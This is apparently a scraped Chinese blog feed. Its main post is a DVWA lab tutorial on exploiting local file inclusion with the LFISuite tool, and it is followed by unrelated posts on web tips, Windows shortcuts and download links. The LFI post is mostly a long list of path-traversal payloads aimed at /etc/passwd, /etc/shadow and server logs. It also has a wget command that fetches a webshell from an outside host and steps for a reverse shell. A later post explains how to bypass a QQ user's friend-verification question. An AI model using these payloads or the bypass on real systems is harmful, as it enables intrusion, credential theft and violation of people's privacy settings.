3088
今天在公众号看到了一个本地文件包含的利用工具,看了下国外大牛对该工具的使用的一个视频,感觉很厉害,通过该工具可对存在本地文件包含漏洞的站点进行利用并返回一个LFI shell,通过返回的LFI shell再次获取一个反向连接,从而可执行相关命令,以前对本地文件包含的利用大多都停留在读取文件,如果有远程文件包含的话就可以getshell。这篇文章主要是对本地文件包含的一个简单介绍及利用,主要是对工具的使用,也主要是记录下该过程,方便以后查看,然后再抽时间研究下大神源代码!大神请绕道而行!: )0x01 文件包含漏洞原理文件包含漏洞主要是程序员把一些公用的代码写在一个单独的文件中,然后使用其他文件进行包含调用,如果需要包含的文件使用硬编码,一般是不会出现安全问题,但是有时可能不确定需要包含哪些具体文件,所以就会采用变量的形式来传递需要包含的文件,但是在使用包含文件的过程中,未对包含的变量进行检查及过滤,导致外部提交的恶意数据作为变量进入到了文件包含的过程中,从而导致提交的恶意数据被执行。文件包含通常分为本地文件包含(Local File Inclusion)和远程文件包含(Remote File Inclusion)。allow_url_fopen和 allow_url_include为0n的情况认为是远程文件包含漏洞,allow_url_fopen为off和 allow_url_include为0n为本地文件包含漏洞,如图1 配置文件所示。本次主要是利用本地文件包含,所以将allow_url_fopen设置为了off。图1 php.ini配置另外,文件包含漏洞主要涉及到的危险函数有四个:include(),require()和include_once(),require_once()。include():执行到include时才包含文件,找不到被包含文件时只会产生警告,脚本将继续执行。require():只要程序一运行就包含文件,找不到被包含的文件时会产生致命错误,并停止脚本。include_once()和require_once():若文件中代码已被包含则不会再次包含。(来自简书)0x02 文件包含漏洞危害通过文件包含漏洞,可以读取系统中的敏感文件,源代码文件等,如密码文件,通过对密码文件进行暴力破解,若破解成功则可获取操作系统的用户账户,甚至可通过开放的远程连接服务进行连接控制;另外文件包含漏洞还可能导致执行任意代码,不管本地文件包含还是远程文件包含!常见的利用方法有以下三点:一、读取目标主机上的其他文件,主要是本地文件包含。二、包含可运行的网页木马,主要是远程文件包含,前提是"allow_url_fopen"是激活的(默认是激活的,没几个人会修改)。三、包含一个创建文件的相应代码文件,因为通过文件包含漏洞获取的shell不是长久的,如果这个漏洞修补了,那么shell也就不存在了,因此需要创建一个真实的shell。我们可以先包含一个可以执行cmd的伪shell,然后使用wget加-O参数(类似:http://x.x.x.x/index.php?page=http://www.1ster.cn/cmd.txt?cmd=wget http://x.x.x.x/muma.txt -O muma.php)获取一个真正的webshell。如果系统中没有wget命令,获取目录不可写,那么我们可以包含一个创建文件的脚本,然后通过脚本上传木马文件。除了以上三点外,应该还有一点就是执行任意命令!0x03 实验环境本次实验环境主要是利用dvwa平台进行演示,如图2所示。DVWA(Damn Vulnerable Web Application)是用PHP+MySQL编写的一套Web漏洞平台,说简单点就是所谓的网站漏洞靶机,该平台包含了SQL注入、XSS、本地文件包含、命令执行等一些常见的Web安全漏洞,并且该平台是开源的,可以从官网直接下载。图2 dvwa平台0x04 本地文件包含利用工具本次主要使用的是LFI SUIT本地文件包含利用工具,是一款用Python2.7编写的神器,适用于Windows,Linux和OS X,并且首次使用会自动配置,自动安装需要的模块,该工具提供了九种不同的文件包含攻击模块,如图3所示。另外当你通过一个可利用的攻击获取到一个LFI shell后,你可以通过输入“reverseshell”命令轻易地获得一个反向shell。但是前提是你必须让你的系统监听反向连接,比如使用“nc –lvp port”。图3 九种不同的文件包含攻击模块0x05 本地文件包含读取文件在之前的本地文件包含漏洞中,大多数都是进行读取文件,如Linux下的密码文件(../../../../etc/shadow以及../../../../etc/passwd),获取并读取一些你知道物理路径的一些文件,如图4所示。图4 读取已知路径下的文件以下是一些简单的测试用例,根据实际情况进行适当的修改。../../tomcat/conf/tomcat-users.xml../%2e%2e%2f which translates to ../%2e%2e/ which translates to ../..%2f which translates to ../%2e%2e%5c which translates to ..\%c1%1c%c0%9v%c0%af..%5c../../../../../../../../../../../../../etc/hosts%00../../../../../../../../../../../../etc/hosts../../boot.ini/../../../../../../../../%2A../../../../../../../../../../../../etc/passwd%00../../../../../../../../../../../../etc/passwd../../../../../../../../../../../../etc/shadow%00../../../../../../../../../../../../etc/shadow/../../../../../../../../../../etc/passwd^^/../../../../../../../../../../etc/shadow^^/../../../../../../../../../../etc/passwd/../../../../../../../../../../etc/shadow/./././././././././././etc/passwd/./././././././././././etc/shadow\..\..\..\..\..\..\..\..\..\..\etc\passwd\..\..\..\..\..\..\..\..\..\..\etc\shadow..\..\..\..\..\..\..\..\..\..\etc\passwd..\..\..\..\..\..\..\..\..\..\etc\shadow/..\../..\../..\../..\../..\../..\../etc/passwd/..\../..\../..\../..\../..\../..\../etc/shadow.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow\..\..\..\..\..\..\..\..\..\..\etc\passwd%00\..\..\..\..\..\..\..\..\..\..\etc\shadow%00..\..\..\..\..\..\..\..\..\..\etc\passwd%00..\..\..\..\..\..\..\..\..\..\etc\shadow%00%0a/bin/cat%20/etc/passwd%0a/bin/cat%20/etc/shadow%00/etc/passwd%00%00/etc/shadow%00%00../../../../../../etc/passwd%00../../../../../../etc/shadow/../../../../../../../../../../../etc/passwd%00.jpg/../../../../../../../../../../../etc/passwd%00.html/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%00%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%255cboot.ini/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini\\'/bin/cat%20/etc/passwd\\'\\'/bin/cat%20/etc/shadow\\'../../../../../../../../conf/server.xml/../../../../../../../../bin/id|C:/inetpub/wwwroot/global.asaC:\inetpub\wwwroot\global.asaC:/boot.iniC:\boot.ini../../../../../../../../../../../../localstart.asp%00../../../../../../../../../../../../localstart.asp../../../../../../../../../../../../boot.ini%00../../../../../../../../../../../../boot.ini/./././././././././././boot.ini/../../../../../../../../../../../boot.ini%00/../../../../../../../../../../../boot.ini/..\../..\../..\../..\../..\../..\../boot.ini/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini\..\..\..\..\..\..\..\..\..\..\boot.ini..\..\..\..\..\..\..\..\..\..\boot.ini%00..\..\..\..\..\..\..\..\..\..\boot.ini/../../../../../../../../../../../boot.ini%00.html/../../../../../../../../../../../boot.ini%00.jpg/.../.../.../.../.../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bo../../../../../../../../../../var/log/httpd/access_log../../../../../../../../../../var/log/httpd/error_log../apache/logs/error.log../apache/logs/access.log../../apache/logs/error.log../../apache/logs/access.log../../../apache/logs/error.log../../../apache/logs/access.log../../../../../../../../../../etc/httpd/logs/acces_log../../../../../../../../../../etc/httpd/logs/acces.log../../../../../../../../../../etc/httpd/logs/error_log../../../../../../../../../../etc/httpd/logs/error.log../../../../../../../../../../var/www/logs/access_log../../../../../../../../../../var/www/logs/access.log../../../../../../../../../../usr/local/apache/logs/access_log../../../../../../../../../../usr/local/apache/logs/access.log../../../../../../../../../../var/log/apache/access_log../../../../../../../../../../var/log/apache/access.log../../../../../../../../../../var/log/access_log../../../../../../../../../../var/www/logs/error_log../../../../../../../../../../var/www/logs/error.log../../../../../../../../../../usr/local/apache/logs/error_log../../../../../../../../../../usr/local/apache/logs/error.log../../../../../../../../../../var/log/apache/error_log../../../../../../../../../../var/log/apache/error.log../../../../../../../../../../var/log/access_log../../../../../../../../../../var/log/error_log/var/log/httpd/access_log/var/log/httpd/error_log../apache/logs/error.log../apache/logs/access.log../../apache/logs/error.log../../apache/logs/access.log../../../apache/logs/error.log../../../apache/logs/access.log/etc/httpd/logs/acces_log/etc/httpd/logs/acces.log/etc/httpd/logs/error_log/etc/httpd/logs/error.log/var/www/logs/access_log/var/www/logs/access.log/usr/local/apache/logs/access_log/usr/local/apache/logs/access.log/var/log/apache/access_log/var/log/apache/access.log/var/log/access_log/var/www/logs/error_log/var/www/logs/error.log/usr/local/apache/logs/error_log/usr/local/apache/logs/error.log/var/log/apache/error_log/var/log/apache/error.log/var/log/access_log/var/log/error_log../../../WEB-INF/web.xml0x06 神器简单获取LFI shell运行LFI SUIT工具及选择攻击模块直接使用python lfisuite.py,如图5所示。此时我们选择利用功能模块1。图5 运行本地文件包含利用工具设置cookie在我们选择利用功能模块1后,会提示让我们输入cookie,如图6所示:图6 设置cookie获取cookie浏览器F12console输入document.cookie即可获取到当前cookie,如图7所示。图7 获取cookie成功获取LFI shell输入cookie后,我们随便选择一个攻击模块试试,在此我们选择3,选取攻击模块后,我们输入漏洞地址即可成功获取到一个shell,如图8所示。图8 成功获取LFI shell0x07 自动模块获取lfi shell如果我们不知道那个攻击模块可以返回shell,我们可以选择自动攻击模块。图9 自动攻击模块选择之后,我们需要选择一个包含路径的文件,我们选择当前目录下的一个文件即可。图10 选择文件选择文件后,该工具会尝试可能性的路径,并且加以利用。图11 选择文件如图12所示,我们成功获取了一个shell。图12 成功获取shell0x08 获取一个反向连接在我们已经获取到lfi shell后,我们可以使用reverseshell来获取一个反向连接,我们先进行监听反向连接,如图13所示。图13 设置监听反向连接我们输入reverseshell后,设置IP即可图14 设置ip及端口此时,我们也成功获取到了一个反向连接,如图15所示。图15 获取到反向连接0x09 扫描模块另外,我们也可以先使用扫描模块,然后在选择对应的攻击模块也能成功获取到LFI shell。使用方法与上面都是一样的,再次就不再进行描述了。0x10 总结与修复本文主要是对文件包含做了一个简单的介绍,如文件包含漏洞的简单原理及危害,最重要的是对本地文件包含漏洞的进一步利用,通过本地文件包含漏洞,从而获取到一个反向连接或者是LFI shell。通过本文也让自己对本地文件包含的危害和利用都有了一定的提高,不在是只停留在读取文件上!通过对该漏洞的利用,最安全的是设置allow_url_fopen和 allow_url_include为0ff,这样就不能利用该漏洞了,另一方面可以做白名单限制,相当于是硬编码,直接把需要包含的文件固定死,这样既不会影响业务,也不会很轻松被利用,其次还是要对用户的输入保持怀疑态度,对用户的输入变量进行严格的检查及过滤!
4
0 2646天前
2884
本文给大家分享了html提高页面加载速度的方法,非常不错具有参考借鉴加载,需要的朋友参考下(1)减少 HTTP 的请求。(合并资源文件 和 使用图片精灵 ;(2)把CSS 放头部,把 JavaScript 放到 body 标签尾部;(3)定义图片的宽和高;(4)定义字符集;(5)避免空的 src 和 href 属性, html里这样写:<a href="javascript:;" class="triggerName">Trigger</a> js 里这样定义: $("#triggerName").click(function(e){ e.preventDefault(); // 取消单击事件的默认动作以阻止链接的跳转// }) (6)启用 GZIP 压缩;(7)摈弃 CSS 表达式,用更高效的 CSS 选择器;(8)使用外链的 CSS 和 JavaScript;(9) 对 CSS 和 JavaScript 进行代码压缩;(10)减少重绘;以上所述是小编给大家介绍的HTML 提高页面加载速度的方法,希望对大家有所帮助!
6
0 2649天前
2963
由于在页面中总是难免javascript脚本语言,在代码中看到body里可以放<script type=”text/javascript”>脚本,而head里也可用<scripttype=”text/javascript”>脚本,想要用好他们,就得了解他们的区别,经过自己的总结发现他们的区别如下: 一、在head主体里写,如果有方法体,那么就是在客户点击的时候触发,如果没写方法体,比如引入的js文件,那么在加载页面前就预加载了。 二、写在body主体里,是为了实现某些部分动态地创建文档。 这里比如制作鼠标跟随事件,肯定只有当页面加载后再进行对鼠标坐标的计算。或者是filter滤镜与javascript的联合使用产生的图片淡入淡出效果等。这个是在页面加载的时候加载。 二、会与body和head标签顺序有关。比如下面代码: <html> <body> <script type="text/javascript"> alert("in body"); </script> </body> <head> <script type="text/javascript"> alert("in head"); </script> </head> </html> 结果是先弹出body,再弹出head. 如果改下代码结果就截然相反了,例 <html> <head> <script type="text/javascript"> alert("in head"); </script> </head> <body> <script type="text/javascript"> alert("in body"); </script> </body> </html> 执行时得考虑javascript执行顺序
6
0 2649天前
3169
先给大家分享下三种查看路径的方法:1、直接按F122、Ctrl+Shift+I查看3、鼠标点击右键查看把以上三种状态都屏蔽掉就可以了。document有onkeydown(键盘按键事件),该事件里面找到对应的keycode并处理就可以,document也有oncontextmenu鼠标右键事件,屏蔽即可却不影响ctrl+c的功能。EMLOG的话在底部添加以下代码,其他程序看着情况添加即可<script language="javascript" type="text/javascript">
window.onload=function(){ document.onkeydown=function(){ var e=window.event||arguments[0]; if(e.keyCode==123){ alert(" 如果刷新请按F5 "); return false; }else if((e.ctrlKey)&&(e.shiftKey)&&(e.keyCode==73)){ alert("键位屏蔽 http://www.xu311.com"); return false; } }; document.oncontextmenu=function(){ alert(" 如果刷新请按F5 "); return false; } }
</script>
4
0 2649天前
10278
在线子域名爆破php网页源码分享二级域名快速爆破,一键爆破子域名加ip地址!字典自行修改添加源码百度网盘链接:http://pan.baidu.com/s/1c6a4fc 密码:i164
7
0 2649天前
2885
杨小杰以前发布过《杨小杰工具箱网页源码》的文章,但是我始终觉得老是去修改源码会很费劲,要是加上一个后台那就会很方便了,所以在这个想法的驱使下,找到了技术支持(涛先森)完完整整的做了一个后台对接!后台可一键修改内容!链接:http://pan.baidu.com/s/1jHXoFqu 密码:bu78
6
0 2649天前
2727
<script type="text/javascript">
//屏蔽右键菜单
document.oncontextmenu = function (event){
if(window.event){
event = window.event;
}try{
var the = event.srcElement;
if (!((the.tagName == "INPUT" && the.type.toLowerCase() == "text") || the.tagName == "TEXTAREA")){
return false;
}
return true;
}catch (e){
return false;
}
}
//屏蔽粘贴
document.onpaste = function (event){
if(window.event){
event = window.event;
}try{
var the = event.srcElement;
if (!((the.tagName == "INPUT" && the.type.toLowerCase() == "text") || the.tagName == "TEXTAREA")){
return false;
}
return true;
}catch (e){
return false;
}
}
//屏蔽复制
document.oncopy = function (event){
if(window.event){
event = window.event;
}try{
var the = event.srcElement;
if(!((the.tagName == "INPUT" && the.type.toLowerCase() == "text") || the.tagName == "TEXTAREA")){
return false;
}
return true;
}catch (e){
return false;
}
}
//屏蔽剪切
document.oncut = function (event){
if(window.event){
event = window.event;
}try{
var the = event.srcElement;
if(!((the.tagName == "INPUT" && the.type.toLowerCase() == "text") || the.tagName == "TEXTAREA")){
return false;
}
return true;
}catch (e){
return false;
}
}
//屏蔽选中
document.onselectstart = function (event){
if(window.event){
event = window.event;
}try{
var the = event.srcElement;
if (!((the.tagName == "INPUT" && the.type.toLowerCase() == "text") || the.tagName == "TEXTAREA")){
return false;
}
return true;
} catch (e) {
return false;
}
}
</script>
5
0 2649天前
280
3037
我是布丁F1帮助F2改名F3搜索F4地址F5刷新F6切换F10菜单CTRL+A全选CTRL+C复制CTRL+X剪切CTRL+V粘贴CTRL+Z撤消CTRL+O打开SHIFT+DELETE永久删除DELETE删除ALT+ENTER属性ALT+F4关闭CTRL+F4关闭ALT+TAB切换ALT+ESC切换ALT+空格键窗口菜单CTRL+ESC开始菜单拖动某一项时按CTRL复制所选项目拖动某一项时按CTRL+SHIFT创建快捷方式将光盘插入到CD-ROM驱动器时按SHIFT键阻止光盘自动播放Ctrl+1,2,3… 切换到从左边数起第1,2,3…个标签Ctrl+A 全部选中当前页面内容Ctrl+C 复制当前选中内容Ctrl+D 打开“添加收藏”面版(把当前页面添加到收藏夹中)Ctrl+E 打开或关闭“搜索”侧边栏(各种搜索引擎可选)Ctrl+F 打开“查找”面版Ctrl+G 打开或关闭“简易收集”面板Ctrl+H 打开“历史”侧边栏Ctrl+I 打开“收藏夹”侧边栏/另:将所有垂直平铺或水平平铺或层叠的窗口恢复Ctrl+K 关闭除当前和锁定标签外的所有标签Ctrl+L 打开“打开”面版(可以在当前页面打开Iternet地址或其他文件…)Ctrl+N 新建一个空白窗口(可更改,Maxthon选项→标签→新建)Ctrl+O 打开“打开”面版(可以在当前页面打开Iternet地址或其他文件…)Ctrl+P 打开“打印”面板(可以打印网页,图片什么的…)Ctrl+Q 打开“添加到过滤列表”面板(将当前页面地址发送到过滤列表)Ctrl+R 刷新当前页面Ctrl+S 打开“保存网页”面板(可以将当前页面所有内容保存下来)Ctrl+T 垂直平铺所有窗口Ctrl+V 粘贴当前剪贴板内的内容Ctrl+W 关闭当前标签(窗口)Ctrl+X 剪切当前选中内容(一般只用于文本操作)Ctrl+Y 重做刚才动作(一般只用于文本操作)Ctrl+Z 撤消刚才动作(一般只用于文本操作)Ctrl+F4 关闭当前标签(窗口)Ctrl+F5 刷新当前页面Ctrl+F6 按页面打开的先后时间顺序向前切换标签(窗口)Ctrl+F11 隐藏或显示菜单栏Ctrl+Tab 以小菜单方式向下切换标签(窗口)Ctrl+Enter 域名自动完成 http://www.XXX.com(内容可更改,Maxthon选项→地址栏→常规)/另:当输入焦点在搜索栏中时,为高亮关键字Ctrl+拖曳 保存该链接的地址或已选中的文本或指定的图片到一个文件夹中(保存目录可更改,Maxthon选项→保存)Ctrl+小键盘’+’ 当前页面放大20%Ctrl+小键盘’-‘ 当前页面缩小20%Ctrl+小键盘’*’ 恢复当前页面的缩放为原始大小Ctrl+Alt+S 自动保存当前页面所有内容到指定文件夹(保存路径可更改,Maxthon选项→保存)Ctrl+Shift+小键盘’+’ 所有页面放大20%Ctrl+Shift+小键盘’-‘ 所有页面缩小20%Ctrl+Shift+F 输入焦点移到搜索栏Ctrl+Shift+G 关闭“简易收集”面板Ctrl+Shift+H 打开并激活到你设置的主页Ctrl+Shift+N 在新窗口中打开剪贴板中的地址,如果剪贴板中为文字,则调用搜索引擎搜索该文字(搜索引擎可选择,Maxthon选项→搜索)Ctrl+Shift+S 打开“保存网页”面板(可以将当前页面所有内容保存下来,等同于Ctrl+S)Ctrl+Shift+W 关闭除锁定标签外的全部标签(窗口)Ctrl+Shift+F6 按页面打开的先后时间顺序向后切换标签(窗口)Ctrl+Shift+Tab 以小菜单方式向上切换标签(窗口)Ctrl+Shift+Enter 域名自动完成 http://www.XXX.com.cn(内容可更改,Maxthon选项→地址栏→常规)Alt+1 保存当前表单Alt+2 保存为通用表单Alt+A 展开收藏夹列表资源管理器END显示当前窗口的底端HOME显示当前窗口的顶端NUMLOCK+数字键盘的减号(-)折叠所选的文件夹NUMLOCK+数字键盘的加号(+)显示所选文件夹的内容NUMLOCK+数字键盘的星号(*)显示所选文件夹的所有子文件夹向左键当前所选项处于展开状态时折叠该项,或选定其父文件夹向右键当前所选项处于折叠状态时展开该项,或选定第一个子文件夹自然键盘【窗口】显示或隐藏“开始”菜单【窗口】+F1帮助【窗口】+D显示桌面【窗口】+R打开“运行”【窗口】+E打开“我的电脑”【窗口】+F搜索文件或文件夹【窗口】+U打开“工具管理器”【窗口】+BREAK显示“系统属性”【窗口】+TAB在打开的项目之间切换辅助功能按右边的SHIFT键八秒钟切换筛选键的开和关按SHIFT五次切换粘滞键的开和关按NUMLOCK五秒钟切换切换键的开和关左边的ALT+左边的SHIFT+NUMLOCK切换鼠标键的开和关左边的ALT+左边的SHIFT+PRINTSCREEN切换高对比度的开和关运行按“开始”-“运行”,或按WIN键+R,在『运行』窗口中输入:(按英文字符顺序排列)%temp%———打开临时文件夹.————–C:\DocumentsandSettings\用户名所在文件夹..————-C:\DocumentsandSettings…————我的电脑\————–C盘appwize.cpl—-添加、删除程序access.cpl—–辅助功能选项Accwiz———辅助功能向导cmd————CMD命令提示符command——–CMD命令提示符chkdsk.exe—–Chkdsk磁盘检查certmgr.msc—-证书管理实用程序calc———–启动计算器charmap——–启动字符映射表cintsetp——-仓颉拼音输入法cliconfg——-SQLSERVER客户端网络实用程序clipbrd——–剪贴板查看器control——–打开控制面板conf———–启动netmeetingcompmgmt.msc—计算机管理cleanmgr——-垃圾整理ciadv.msc——索引服务程序dcomcnfg——-打开系统组件服务ddeshare——-打开DDE共享设置dxdiag———检查DirectX信息drwtsn32——-系统医生devmgmt.msc—-设备管理器desk.cpl——-显示属性dfrg.msc——-磁盘碎片整理程序diskmgmt.msc—磁盘管理实用程序dvdplay——–DVD播放器eventvwr——-事件查看器eudcedit——-造字程序explorer——-打开资源管理器fsmgmt.msc—–共享文件夹管理器firewall.cpl—WINDOWS防火墙gpedit.msc—–组策略hdwwiz.cpl—–添加硬件iexpress——-木马捆绑工具,系统自带inetcpl.cpl—-INTETNET选项intl.cpl——-区域和语言选项(输入法选项)irprops.cpl—-无线链接joy.cpl——–游戏控制器lusrmgr.msc—-本机用户和组logoff———注销命令main.cpl——-鼠标mem.exe——–显示内存使用情况migwiz———文件转移向导mlcfg32.cpl—-邮件mplayer2——-简易widnowsmediaplayermspaint——–画图板msconfig.exe—系统配置实用程序mstsc———-远程桌面连接magnify——–放大镜实用程序mmc————打开控制台mmsys.cpl——声音和音频设备mobsync——–同步命令ncpa.cpl——-网络连接nslookup——-IP地址侦测器netstartX—-开始X服务netstopX—–停止X服务netstat-an—-命令检查接口netsetup.cpl—无线网络安装向导notepad——–打开记事本nslookup——-IP地址侦探器narrator——-屏幕“讲述人”ntbackup——-系统备份和还原ntmsmgr.msc—-移动存储管理器ntmsoprq.msc—移动存储管理员操作请求nusrmgr.cpl—-用户账户nwc.cpl——–NetWare客户服务osk————打开屏幕键盘odbcad32——-ODBC数据源管理器odb无党派人士32.cpl—ODBC数据源管理器oobe/msoobe/a-检查XP是否激活packager——-对象包装程序perfmon.msc—-计算机性能监测程序powercfg.cpl—电源选项progman——–程序管理器regedit——–注册表rsop.msc——-组策略结果集regedt32——-注册表编辑器regsvr32/?—-调用、卸载DLL文件运行(详细请在cmd中输入regsvr32/?)sapi.cpl——-语音services.msc—本地服务设置syncapp——–创建一个公文包sysedit——–系统配置编辑器sigverif——-文件签名验证程序sndrec32——-录音机sndvol32——-音量控制程序shrpubw——–共享文件夹设置工具secpol.msc—–本地安全策略sysdm.cpl——系统syskey———系统加密(一旦加密就不能解开,保护windowsxp系统的双重密码)services.msc—本地服务设置sfc.exe——–系统文件检查器sfc/scannow—windows文件保护shutdown——-关机命令(详细请在cmd中输入shutdown/?)taskmgr——–任务管理器telephon.cpl—电话和调制解调器选项telnet———远程连接程序timedate.cpl—日期和时间tourstart——xp简介(安装完成后出现的漫游xp程序)tsshutdn——-60秒倒计时关机命令utilman——–辅助工具管理器winver———检查Windows版本winmsd———系统信息wiaacmgr——-扫描仪和照相机向导winchat——–XP自带局域网聊天wmimgmt.msc—-打开windows管理体系结构(WMI)wordpad——–写字板wuaucpl.cpl—-自动更新wupdmgr——–windows更新程序write———-写字板w***——–windows脚本宿主设置wscui.cpl——安全中心
9
0 2652天前
9316
有没有遇到加某个人的时候提示需要正确回答问题才可以添加好友的?你就这样放弃了?从现在开始,不用放弃了,我教你如何绕过需要正确回答问题的QQ,直接添加ta。首先先把自己的QQ改成“需要正确回答问题后”才能加我为好友。然后第一步:打开3gqq网址。第二步:输入QQ和密码并登录。第三步:登录直接会显示自己的QQ好友列表,把页面拉到最下面。点击查找。第四步:输入你要添加的QQ号码,点击添加好友。根本就不需要回答问题了,直接是输入验证信息。如果觉得教程有用,手打的不容易呀!
12
0 2652天前